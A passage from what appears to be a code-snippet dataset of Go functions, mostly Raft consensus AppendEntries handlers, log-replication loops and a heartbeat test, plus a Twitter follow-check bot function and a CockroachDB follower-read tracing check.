len(raft.Log)-1, raft.NextIndex[PID])\n raft.NextIndex[PID] = len(raft.Log) - 1\n }\n\n log.Printf(\"[PUTENTRY->]: [PID=%d]\", PID)\n for {\n // Regenerate arguments on each call, because\n // raft state may have changed between calls\n spec.RaftRWMutex.RLock()\n args := raft.GetAppendEntriesArgs(&self)\n args.PrevLogIndex = raft.NextIndex[PID] - 1\n args.PrevLogTerm = spec.GetTerm(&raft.Log[args.PrevLogIndex])\n args.Entries = raft.Log[raft.NextIndex[PID]:]\n config.LogIf(\n fmt.Sprintf(\"appendEntriesUntilSuccess() to [PID=%d] with args: T:%v, L:%v, PLI:%v, PLT:%v, LC:%v\",\n PID,\n args.Term,\n args.LeaderId,\n args.PrevLogIndex,\n args.PrevLogTerm,\n args.LeaderCommit,\n ),\n config.C.LogAppendEntries)\n spec.RaftRWMutex.RUnlock()\n result = CallAppendEntries(PID, args)\n log.Println(result)\n\n // Success! Increment next/matchIndex as a function of our inputs\n // Otherwise, decrement nextIndex and try again.\n spec.RaftRWMutex.Lock()\n if result.Success {\n raft.MatchIndex[PID] = args.PrevLogIndex + len(args.Entries)\n raft.NextIndex[PID] = raft.MatchIndex[PID] + 1\n spec.RaftRWMutex.Unlock()\n return result\n }\n\n // Decrement NextIndex if the failure was due to log consistency.\n // If not, update our term and step down\n if result.Term > raft.CurrentTerm {\n raft.CurrentTerm = result.Term\n raft.Role = spec.FOLLOWER\n }\n\n if result.Error != responses.CONNERROR {\n raft.NextIndex[PID] -= 1\n spec.RaftRWMutex.Unlock()\n continue\n }\n\n if retries > 5 {\n spec.RaftRWMutex.Unlock()\n return &responses.Result{Success: false, Error: responses.CONNERROR}\n }\n\n retries++\n time.Sleep(time.Second)\n spec.RaftRWMutex.Unlock()\n }\n}", "func (rf *Raft) sendAppendEntries(server int, args AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\tDPrintf(\"Serv[%d], SendAppendEntries to %d\\n\", rf.me, server)\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\tDPrintf(\"Serv[%d], SendAppendEntries rsp from %d\\n\", rf.me, server)\n\treturn ok\n}", "func (rf *Raft) AppendEntriesHandler(req *AppendEntriesRequest, resp *AppendEntriesResponse) {\n\n\t/*++++++++++++++++++++CRITICAL SECTION++++++++++++++++++++*/\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.info(\"AppendEntries RPC returns\")\n\n\trf.info(\"AppendEntries RPC receives %+v\", *req)\n\tresp.ResponseTerm = rf.currentTerm\n\n\t// 1. reply false if term < currentTerm (§5.1)\n\tif req.LeaderTerm < rf.currentTerm {\n\t\tresp.Info = TERM_OUTDATED\n\t\treturn\n\t}\n\n\t// reset the election timeout\n\trf.resetTrigger()\n\n\t// if RPC request or response contains term T > currentTerm:\n\t// set currentTerm = T, convert to follower (§5.1)\n\tif req.LeaderTerm > rf.currentTerm {\n\t\trf.currentTerm = req.LeaderTerm\n\t\trf.persist()\n\t\trf.role = FOLLOWER\n\t}\n\n\t// finds the position of the given PrevLogIndex at the log\n\tsliceIdx := req.PrevLogIndex - rf.offset\n\n\tswitch {\n\n\t// PrevLogIndex points beyond the end of the log,\n\t// handle it the same as if the entry exists but the term did not match\n\t// i.e., reply false\n\tcase sliceIdx >= len(rf.logs):\n\t\tresp.Info = LOG_INCONSISTENT\n\t\tresp.ConflictIndex = len(rf.logs) + rf.offset - 1\n\t\tresp.ConflictTerm = -1\n\t\treturn\n\n\t// PrevLogIndex matches the lastIncludedIndex (no log)\n\tcase sliceIdx == -1 && req.PrevLogIndex == 0:\n\n\t// PrevLogIndex matches the lastIncludedIndex in the snapshot\n\tcase sliceIdx == -1 && req.PrevLogIndex == rf.lastIncludedIndex:\n\n\tcase sliceIdx < 0:\n\t\tresp.Info = LOG_INCONSISTENT\n\t\tresp.ConflictIndex = 0\n\t\tresp.ConflictTerm = -1\n\t\tmsg := fmt.Sprintf(\"%s A=%d,C=%d,T=%d,O=%d,{...=>[%d|%d]}\",\n\t\t\ttime.Now().Format(\"15:04:05.000\"), rf.lastAppliedIndex, rf.commitIndex, rf.currentTerm, rf.offset, rf.lastIncludedIndex, rf.lastIncludedTerm)\n\n\t\tif len(rf.logs) == 0 {\n\t\t\tmsg += \"{} \"\n\t\t} else {\n\t\t\tmsg += fmt.Sprintf(\"{%+v->%+v} \", rf.logs[0], rf.logs[len(rf.logs)-1])\n\t\t}\n\t\tmsg += fmt.Sprintf(RAFT_FORMAT, rf.me)\n\t\tmsg += fmt.Sprintf(\"##### APPEND_ENTRIES REQ3%+v\", *req)\n\t\tmsg += \"\\n\"\n\n\t\tfmt.Println(msg)\n\t\treturn\n\n\tdefault:\n\t\t// 2. reply false if the log doesn't contain an entry at prevLogIndex\n\t\t// whose term matches prevLogTerm (§5.3)\n\t\tif rf.logs[sliceIdx].Term != req.PrevLogTerm {\n\t\t\tresp.ConflictTerm = rf.logs[sliceIdx].Term\n\t\t\tfor i := 0; i <= sliceIdx; i++ {\n\t\t\t\tif rf.logs[i].Term == resp.ConflictTerm {\n\t\t\t\t\tresp.ConflictIndex = rf.logs[i].Index\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tresp.Info = LOG_INCONSISTENT\n\t\t\treturn\n\t\t}\n\t}\n\n\tresp.Info = SUCCESS\n\n\t// 3. if an existing entry conflicts with a new one (same index\n\t// but different terms), delete the existing entry and all that\n\t// follow it (§5.3)\n\t// 4. append any new entries not already in the log\n\ti := sliceIdx + 1\n\tj := 0\n\n\tes := make([]LogEntry, len(req.Entries))\n\tcopy(es, req.Entries)\n\tfor j < len(es) {\n\t\tif i == len(rf.logs) {\n\t\t\trf.logs = append(rf.logs, es[j])\n\t\t} else if rf.logs[i].Term != es[j].Term {\n\t\t\trf.logs = rf.logs[:i]\n\t\t\trf.logs = append(rf.logs, es[j])\n\t\t}\n\t\ti++\n\t\tj++\n\t}\n\trf.persist()\n\n\t// 5. If leaderCommit > commitIndex, set commitIndex =\n\t// min(leaderCommit, index of last new entry)\n\trf.receiverTryUpdateCommitIndex(req)\n\t/*--------------------CRITICAL SECTION--------------------*/\n}", "func CheckFollowMe(tweet *twitter.Tweet, twitterClient *twitter.Client, appConfig *AppConfig, tweetRefID *int64) bool {\n\tparams := &twitter.FollowerIDParams{\n\t\tScreenName: appConfig.Twitter.Username,\n\t\tCount: 5000,\n\t}\n\n\tfollowerIDs, _, err := twitterClient.Followers.IDs(params)\n\tif err != nil {\n\t\treturn true\n\t}\n\n\tfor _, ID := range followerIDs.IDs {\n\t\tif ID == tweet.User.ID {\n\t\t\treturn false\n\t\t}\n\t}\n\tif err := GetSessionByUserID(&Session{}, tweet.User.ID); err != nil {\n\t\tsession := &Session{\n\t\t\tUserID: tweet.User.ID,\n\t\t\tScreenName: tweet.User.ScreenName,\n\t\t\tState: \"pending\",\n\t\t}\n\n\t\tif err := CreateSession(session); err != nil {\n\t\t\treturn true\n\t\t}\n\t}\n\n\tTweet(\n\t\ttwitterClient,\n\t\tfmt.Sprintf(\"@%s %s\", tweet.User.ScreenName, appConfig.Messages.FollowMe),\n\t\ttweetRefID,\n\t)\n\treturn true\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\n\trf.mux.Lock() //CS accessing raft DS variables\n\treply.Term = rf.currTerm //default reply values\n\n\tif rf.currTerm <= args.Term {\n\t\trf.logger.Printf(\"received valid heartbeat from leader %v\", args.LeaderId)\n\t\trf.currTerm = args.Term\n\t\treply.Term = rf.currTerm //update terms\n\n\t\t//Acknowledge higher current leader. Reset to follower\n\t\trf.role = Follower\n\t\trf.numVotes = 0\n\t\trf.votedFor = -1\n\t\trf.elecTimer.Reset(time.Duration(rand.Intn(RANGE)+LOWER) * time.Millisecond)\n\t\trf.logger.Printf(\"resetting to follower on getting heartbeat from %v \\n\", args.LeaderId)\n\n\t}\n\trf.mux.Unlock()\n}", "func (rf *Raft) StartAppendLog() {\n\tvar count int32 = 1\n\tfor i, _ := range rf.peers {\n\t\tif i == rf.me {\n\t\t\tcontinue\n\t\t}\n\t\tgo func(i int) {\n\t\t\tfor{\n\t\t\t\trf.mu.Lock()\n\t\t\t\t//fmt.Printf(\"follower %d lastlogindex: %v, nextIndex: %v\\n\",i, rf.GetPrevLogIndex(i), rf.nextIndex[i])\n\t\t\t\t//fmt.Print(\"sending log entries from leader %d to peer %d for term %d\\n\", rf.me, i, rf.currentTerm)\n\t\t\t\t//fmt.Print(\"nextIndex:%d\\n\", rf.nextIndex[i])\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\targs := AppendEntriesArgs{\n\t\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\t\tLeaderId: rf.me,\n\t\t\t\t\tPrevLogIndex: rf.GetPrevLogIndex(i),\n\t\t\t\t\tPrevLogTerm: rf.GetPrevLogTerm(i),\n\t\t\t\t\tEntries: append(make([]LogEntry, 0), rf.logEntries[rf.nextIndex[i]:]...),\n\t\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t\t}\n\t\t\t\treply := AppendEntriesReply{}\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tok := rf.sendAppendEntries(i, &args, &reply)\n\n\t\t\t\tif !ok {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\trf.mu.Lock()\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Term > rf.currentTerm {\n\t\t\t\t\trf.BeFollower(reply.Term)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tsend(rf.appendEntry)\n\t\t\t\t\t}()\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Success {\n\t\t\t\t\trf.matchIndex[i] = args.PrevLogIndex + len(args.Entries)\n\t\t\t\t\trf.nextIndex[i] = rf.matchIndex[i] + 1\n\t\t\t\t\t//fmt.Print(\"leader: %v, for peer %v, match index: %d, next index: %d, peers: %d\\n\", rf.me, i, rf.matchIndex[i], rf.nextIndex[i], len(rf.peers))\n\t\t\t\t\tatomic.AddInt32(&count, 1)\n\t\t\t\t\tif atomic.LoadInt32(&count) > int32(len(rf.peers)/2) {\n\t\t\t\t\t\t//fmt.Print(\"leader %d reach agreement\\n, args.prevlogindex:%d, len:%d\\n\", rf.me, args.PrevLogIndex, len(args.Entries))\n\t\t\t\t\t\trf.UpdateCommitIndex()\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\t//fmt.Printf(\"peer %d reset the next index from %d to %d\\n\", i, rf.nextIndex[i], rf.nextIndex[i]-1)\n\t\t\t\t\tif rf.nextIndex[i] > 0 {\n\t\t\t\t\t\trf.nextIndex[i]--\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t} else {\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t\t}\n\t\t}(i)\n\t}\n\n}", "func (r *Raft) appendEntries(rpc RPC, a *AppendEntriesRequest) (transition bool) {\n\t// Setup a response\n\tresp := &AppendEntriesResponse{\n\t\tTerm: r.getCurrentTerm(),\n\t\tLastLog: r.getLastLogIndex(),\n\t\tSuccess: false,\n\t}\n\tvar err error\n\tdefer rpc.Respond(resp, err)\n\n\t// Ignore an older term\n\tif a.Term < r.getCurrentTerm() {\n\t\terr = errors.New(\"obsolete term\")\n\t\treturn\n\t}\n\n\t// Increase the term if we see a newer one, also transition to follower\n\t// if we ever get an appendEntries call\n\tif a.Term > r.getCurrentTerm() || r.getState() != Follower {\n\t\tr.currentTerm = a.Term\n\t\tresp.Term = a.Term\n\n\t\t// Ensure transition to follower\n\t\ttransition = true\n\t\tr.setState(Follower)\n\t}\n\n\t// Verify the last log entry\n\tvar prevLog Log\n\tif a.PrevLogEntry > 0 {\n\t\tif err := r.logs.GetLog(a.PrevLogEntry, &prevLog); err != nil {\n\t\t\tr.logW.Printf(\"Failed to get previous log: %d %v\",\n\t\t\t\ta.PrevLogEntry, err)\n\t\t\treturn\n\t\t}\n\t\tif a.PrevLogTerm != prevLog.Term {\n\t\t\tr.logW.Printf(\"Previous log term mis-match: ours: %d remote: %d\",\n\t\t\t\tprevLog.Term, a.PrevLogTerm)\n\t\t\treturn\n\t\t}\n\t}\n\n\t// Add all the entries\n\tfor _, entry := range a.Entries {\n\t\t// Delete any conflicting entries\n\t\tif entry.Index <= r.getLastLogIndex() {\n\t\t\tr.logW.Printf(\"Clearing log suffix from %d to %d\",\n\t\t\t\tentry.Index, r.getLastLogIndex())\n\t\t\tif err := r.logs.DeleteRange(entry.Index, r.getLastLogIndex()); err != nil {\n\t\t\t\tr.logE.Printf(\"Failed to clear log suffix: %w\", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\t\t// Append the entry\n\t\tif err := r.logs.StoreLog(entry); err != nil {\n\t\t\tr.logE.Printf(\"Failed to append to log: %w\", err)\n\t\t\treturn\n\t\t}\n\n\t\t// Update the lastLog\n\t\tr.setLastLogIndex(entry.Index)\n\t}\n\n\t// Update the commit index\n\tif a.LeaderCommitIndex > 0 && a.LeaderCommitIndex > r.getCommitIndex() {\n\t\tidx := min(a.LeaderCommitIndex, r.getLastLogIndex())\n\t\tr.setCommitIndex(idx)\n\n\t\t// Trigger applying logs locally\n\t\tr.commitCh <- commitTuple{idx, nil}\n\t}\n\n\t// Set success\n\tresp.Success = true\n\treturn\n}", "func (r *Raft) setupAppendEntries(s *followerReplication, req *pb.AppendEntriesRequest, nextIndex, lastIndex uint64) error {\n\treq.Term = s.currentTerm\n\treq.Leader = r.transport.EncodePeer(r.localID, r.localAddr)\n\treq.LeaderCommitIndex = r.getCommitIndex()\n\tif err := r.setPreviousLog(req, nextIndex); err != nil {\n\t\treturn err\n\t}\n\tif err := r.setNewLogs(req, nextIndex, lastIndex); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(args.Term)\n\t}\n\t// TODO: check, this is a new approach to use goroutine\n\tgo func() {\n\t\trf.heartBeatCh <- true\n\t}()\n\treply.Term = rf.currentTerm\n\treply.Success = true\n\n\tif len(args.LogEntries) > 0 {\n\t\t// validate the log, remove duplicate\n\t\treply.Success, reply.LatestLogEntry = rf.appendEntries(args)\n\t}\n\tif args.LeaderCommit > rf.commitIndex {\n\t\trf.commitIndex = min(args.LeaderCommit, rf.getLastLog().Index)\n\t}\n\treturn\n}", "func (rf *Raft) sendEntries() {\n\trf.mu.Lock()\n\tlastLog := rf.getLastLog()\n\trf.mu.Unlock()\n\tfor i := range rf.peers {\n\t\tif i == rf.me {\n\t\t\tcontinue\n\t\t}\n\t\trf.mu.Lock()\n\t\tmatchIndex := rf.LeaderStatus.matchIndex[i]\n\t\tnextIndex := rf.LeaderStatus.nextIndex[i]\n\t\t//DPrintf(\"send entry peer=%v matchIndex=%v lastIndex=%v nextIndex=%v\", i, matchIndex, lastLog.Index, nextIndex)\n\t\tvar req *AppendEntriesArgs\n\t\t// TODO: whether delete ???\n\t\tif matchIndex >= lastLog.Index {\n\t\t\treq = &AppendEntriesArgs{\n\t\t\t\tType: HeartBeat,\n\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\tLeaderId: rf.peerId,\n\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t}\n\t\t\tDPrintf(\"peer=%v send heartbeat to peer=%v\", rf.me, i)\n\t\t} else {\n\t\t\t// TODO: if the logEntries be cutoff after make snapshot, we should shift the start index\n\t\t\tlogEntries := rf.logEntries[matchIndex+1 : min(nextIndex+1, len(rf.logEntries))]\n\t\t\tprevLog := rf.logEntries[matchIndex]\n\t\t\treq = &AppendEntriesArgs{\n\t\t\t\tType: Entries,\n\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\tLeaderId: rf.peerId,\n\t\t\t\tPrevLogIndex: prevLog.Index,\n\t\t\t\tPrevLogTerm: prevLog.Term,\n\t\t\t\tLogEntries: logEntries, // TODO: refine to control each time send message count (case 2B)\n\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t}\n\t\t\t//DPrintf(\"peer=%v send entry=%v to=%v next=%v logEntrySize=%d\", rf.me, rf.logEntries[matchIndex+1 : nextIndex+1], i, nextIndex, len(logEntries))\n\t\t}\n\t\trf.mu.Unlock()\n\t\tgo rf.sendAppendEntries(i, req, &AppendEntriesReply{})\n\t}\n}", "func OnlyFollowerReads(rec tracing.Recording) bool {\n\tfoundFollowerRead := false\n\tfor _, sp := range rec {\n\t\tif sp.Operation == \"/cockroach.roachpb.Internal/Batch\" &&\n\t\t\tsp.Tags[\"span.kind\"] == \"server\" {\n\t\t\tif tracing.LogsContainMsg(sp, kvbase.FollowerReadServingMsg) {\n\t\t\t\tfoundFollowerRead = true\n\t\t\t} else {\n\t\t\t\treturn false\n\t\t\t}\n\t\t}\n\t}\n\treturn foundFollowerRead\n}", "func (rf *Raft) CheckLogs() {\n\trf.mu.Lock()\n\tstate := rf.state\n\trf.mu.Unlock()\n\tfor state == LEADER {\n\t\t//DPrintf(\"CHECKLOGS ON NODE %d: logs %s\", rf.me, rf.logs)\n\t\t//appendChan := make(chan AppendResult, len(rf.peers))\n\t\tfor peerId := range rf.peers {\n\t\t\tif peerId == rf.me {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\trf.mu.Lock()\n\t\t\tlogLen := len(rf.logs)\n\t\t\tnextIndex := rf.nextIndex[peerId]\n\t\t\trf.mu.Unlock()\n\t\t\tif logLen > nextIndex {\n\t\t\t\tgo func(peerId int) {\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tprevLogIndex := rf.matchIndex[peerId]\n\t\t\t\t\tprevLogTerm := rf.logs[prevLogIndex].Term\n\t\t\t\t\targs := AppendEntriesArgs{rf.currentTerm, rf.me,\n\t\t\t\t\t\tprevLogIndex, prevLogTerm,\n\t\t\t\t\t\trf.logs[prevLogIndex+1:], rf.commitIndex}\n\t\t\t\t\t\t//DPrintf(\"[BEFOREAPPEND] ENTRIES %s PREV %d LOGS %s\", args.Entries, args.PrevLogIndex, rf.logs)\n\t\t\t\t\trepl := AppendResult{}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\tfor rf.state == LEADER {\n\t\t\t\t\t\trf.sendAppendEntries(peerId, &args, &repl)\n\t\t\t\t\t\t//DPrintf(\"[CHECKAPPENDENTRIES REPLY]me: %d Term %d send to %d args: %s repl %s\", rf.me, rf.currentTerm, peerId, args, repl)\n\t\t\t\t\t\tif repl.Success && rf.state == LEADER{\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\trf.nextIndex[peerId] = args.PrevLogIndex + len(args.Entries) + 1\n\t\t\t\t\t\t\trf.matchIndex[peerId] = args.PrevLogIndex + len(args.Entries)\n\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\tif repl.Term > rf.currentTerm {\n\t\t\t\t\t\t\trf.currentTerm = repl.Term\n\t\t\t\t\t\t\trf.state = FOLLOWER\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tif args.PrevLogIndex > 0 {\n\t\t\t\t\t\t\targs.PrevLogIndex -= 1\n\t\t\t\t\t\t\targs.PrevLogTerm = rf.logs[args.PrevLogIndex].Term\n\t\t\t\t\t\t\targs.Entries = rf.logs[args.PrevLogIndex+1:]\n\t\t\t\t\t\t}\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t}\n\t\t\t\t}(peerId)\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(time.Duration(50) * time.Millisecond)\n\t\t// sleep for a while\n\t}\n}", "func (rf *Raft) sendAppendEntries(server int, args *AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func (rf *Raft) sendAppendEntries(server int, args *AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func TestHandleHeartbeatResp(t *testing.T) {\n\tstorage := NewMemoryStorage()\n\tdefer storage.Close()\n\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tsm.raftLog.commitTo(sm.raftLog.lastIndex())\n\n\t// A heartbeat response from a node that is behind; re-send MsgApp\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgApp {\n\t\tt.Errorf(\"type = %v, want MsgApp\", msgs[0].Type)\n\t}\n\n\t// A second heartbeat response generates another MsgApp re-send\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgApp {\n\t\tt.Errorf(\"type = %v, want MsgApp\", msgs[0].Type)\n\t}\n\n\t// Once we have an MsgAppResp, heartbeats no longer send MsgApp.\n\tsm.Step(pb.Message{\n\t\tFrom: 2,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: msgs[0].Index + uint64(len(msgs[0].Entries)),\n\t})\n\t// Consume the message sent in response to MsgAppResp\n\tsm.readMessages()\n\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 0 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 0: %+v\", len(msgs), msgs)\n\t}\n}", "func (r *Raft) serviceAppendEntriesReq(request AppendEntriesReq, HeartBeatTimer *time.Timer, waitTime int, state int) int {\n\t//replicates entry wise , one by one\n\tbecomeFollower := false //for candidate caller only\n\twaitTime_msecs := msecs * time.Duration(waitTime)\n\tappEntriesResponse := AppendEntriesResponse{} //make object for responding to leader\n\tappEntriesResponse.FollowerId = r.Myconfig.Id\n\tappEntriesResponse.Success = false //false by default\n\tappEntriesResponse.IsHeartBeat = false //by default\n\tvar myLastIndexTerm, myLastIndex int\n\tmyLastIndex = r.MyMetaData.LastLogIndex\n\tif request.Term >= r.myCV.CurrentTerm { //valid leader\n\t\tleaderId := request.LeaderId\n\t\tr.UpdateLeaderInfo(leaderId) //update leader info\n\t\tif request.Term > r.myCV.CurrentTerm {\n\t\t\tr.myCV.CurrentTerm = request.Term //update self Term\n\t\t\tr.myCV.VotedFor = -1 //update votedfor whenever CT is changed\n\t\t\tr.WriteCVToDisk()\n\t\t}\n\t\tif state == follower {\n\t\t\tHeartBeatTimer.Reset(waitTime_msecs) //reset the timer if this is HB or AE req from valid leader\n\t\t}\n\t\tif len(r.MyLog) == 0 { //if log is empty\n\t\t\tmyLastIndexTerm = -1\n\t\t} else {\n\t\t\tmyLastIndexTerm = r.MyLog[myLastIndex].Term\n\t\t}\n\t\t//This is a HB,here log is empty on both sides so Term must not be checked (as leader has incremented its Term due to elections)\n\t\tif request.Entries == nil {\n\t\t\tif len(r.MyLog) == 0 { //just to be sure ===must be satisfied otherwise leader is invalid and logic bug is there.\n\t\t\t\tappEntriesResponse.Success = true\n\t\t\t\tappEntriesResponse.IsHeartBeat = true\n\t\t\t\tbecomeFollower = true\n\t\t\t}\n\t\t} else { //log has Data so-- for heartbeat, check the index and Term of last entry\n\t\t\tif request.LeaderLastLogIndex == myLastIndex && request.LeaderLastLogTerm == myLastIndexTerm {\n\t\t\t\t//this is heartbeat as last entry is already present in self log\n\t\t\t\tappEntriesResponse.Success = true\n\t\t\t\tappEntriesResponse.IsHeartBeat = true\n\t\t\t\tr.MyMetaData.CommitIndex = request.LeaderCommitIndex //update the CI for last entry that leader got majority acks for!\n\t\t\t\tbecomeFollower = true\n\t\t\t} else { //this is not a heartbeat but append request\n\t\t\t\tif request.PrevLogTerm == myLastIndexTerm && request.PrevLogIndex == myLastIndex { //log is consistent except new entry\n\t\t\t\t\tbecomeFollower = true\n\t\t\t\t\tif state == follower { //when caller is follower then only append to log\n\t\t\t\t\t\tr.AppendToLog_Follower(request) //append to log\n\t\t\t\t\t\tappEntriesResponse.Success = true\n\t\t\t\t\t\tappEntriesResponse.IsHeartBeat = false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tappEntriesResponse.Term = r.myCV.CurrentTerm\n\tappEntriesResponse.LastLogIndex = r.MyMetaData.LastLogIndex\n\tr.send(request.LeaderId, appEntriesResponse)\n\tif state == candidate && becomeFollower { //this is candidate call\n\t\treturn follower\n\t} else {\n\t\treturn -1\n\t}\n}", "func (r *Raft) sendAppend(to uint64) bool {\n\t//\tappend entry\n\tlastIndex := r.RaftLog.LastIndex()\n\tprs := r.Prs[to]\n\tmatched := prs.Match\n\t//if matched < lastIndex {\n\tmsg := r.buildMsgWithoutData(pb.MessageType_MsgAppend, to, false)\n\tvar position int\n\t// send empty append,update follower committed index\n\tif matched == r.RaftLog.LastIndex() {\n\t\tposition = len(r.RaftLog.entries)\n\t} else {\n\t\tp, found := r.RaftLog.findByIndex(matched + 1)\n\t\tif !found {\n\t\t\tpanic(\"not found matched index\")\n\t\t}\n\t\tposition = p\n\t}\n\n\tmsg.Entries = entryValuesToPoints(r.RaftLog.entries[position:])\n\tmsg.Index = prs.Match\n\tt, err := r.RaftLog.Term(prs.Match)\n\tif err != nil {\n\t\tpanic(\"error \")\n\t}\n\tmsg.LogTerm = t\n\tmsg.Commit = r.RaftLog.committed\n\tr.appendMsg(msg)\n\t//update prs\n\tr.Prs[to] = &Progress{\n\t\tMatch: prs.Match,\n\t\tNext: lastIndex + 1,\n\t}\n\treturn true\n\t//}\n\t// Your Code Here (2A).\n\t//return false\n}", "func (r *Raft) serviceAppendEntriesReq(request AppendEntriesReq, HeartBeatTimer *time.Timer, waitTime int) {\n\t//replicates entry wise , one by one\n\twaitTime_secs := secs * time.Duration(waitTime)\n\n\t//fmt.Println(\"Hearbeat came to\", r.Myconfig.Id, \"my and request terms are:\", r.currentTerm, request.term)\n\tappEntriesResponse := AppendEntriesResponse{} //make object for responding to leader\n\tappEntriesResponse.followerId = r.Myconfig.Id\n\tappEntriesResponse.success = false //false by default\n\tappEntriesResponse.isHeartBeat = false //by default\n\tvar myLastIndexTerm, myLastIndex int\n\tmyLastIndex = r.myMetaData.lastLogIndex\n\t//fmt.Println(\"I am\", r.Myconfig.Id, \"checking if valid leader:\", request.leaderId)\n\tif request.term >= r.currentTerm { //valid leader\n\t\t//fmt.Println(\"I am\", r.Myconfig.Id, \"this is valid leader:\", request.leaderId)\n\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\tr.currentTerm = request.term //update self term\n\t\tHeartBeatTimer.Reset(waitTime_secs) //reset the timer if this is HB or AE req from valid leader\n\t\tif len(r.myLog) == 0 { //if log is empty\n\t\t\tmyLastIndexTerm = -1\n\t\t} else {\n\t\t\tmyLastIndexTerm = r.myLog[myLastIndex].Term\n\t\t}\n\t\t//This is a HB,here log is empty on both sides so term must not be checked (as leader has incremented its term due to elections)\n\t\tif request.entries == nil && myLastIndex == request.leaderLastLogIndex {\n\t\t\t//case when first condition is true and 2nd fails wont come,since AE comes from a leader with\n\t\t\t//empty log(hence entries nil) whereas follower has values(2nd condition mismatch)\n\t\t\tappEntriesResponse.success = true\n\t\t\tappEntriesResponse.isHeartBeat = true\n\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Log empty, HB received!(In serviceAppendReq)\")\n\t\t} else { //log has data so-- for hearbeat, check the index and term of last entry\n\t\t\tif request.leaderLastLogIndex == myLastIndex && request.term == myLastIndexTerm {\n\t\t\t\t//this is heartbeat as last entry is already present in self log\n\t\t\t\tappEntriesResponse.success = true\n\t\t\t\tappEntriesResponse.isHeartBeat = true\n\t\t\t\tr.myMetaData.commitIndex = request.leaderCommitIndex //update the CI for last entry that leader got majority acks for!\n\t\t\t\t//fmt.Println(\"I am\", r.Myconfig.Id, \"this is valid leader:\", request.leaderId, \"got HB\", r.myMetaData.commitIndex)\n\t\t\t} else { //this is not a heartbeat but append request\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"This is append request \\n r.currentTerm,mylastTerm,req.prevLogTerm,mylastIndex,req.prevLogIndex\", r.currentTerm, myLastIndexTerm, request.prevLogTerm, myLastIndex, request.prevLogIndex)\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"This is append request\", string(request.entries))\n\t\t\t\t//term and index of self last entry and request's previous entries must be checked\n\t\t\t\t//but what if r.current term has increased to more than the term of last log entry due to repeated elections but no CA req during that time\n\t\t\t\t//so extract the last term from self log--previously it was being compared to r.currentTerm--FAILING NOW--FIXED\n\t\t\t\tif 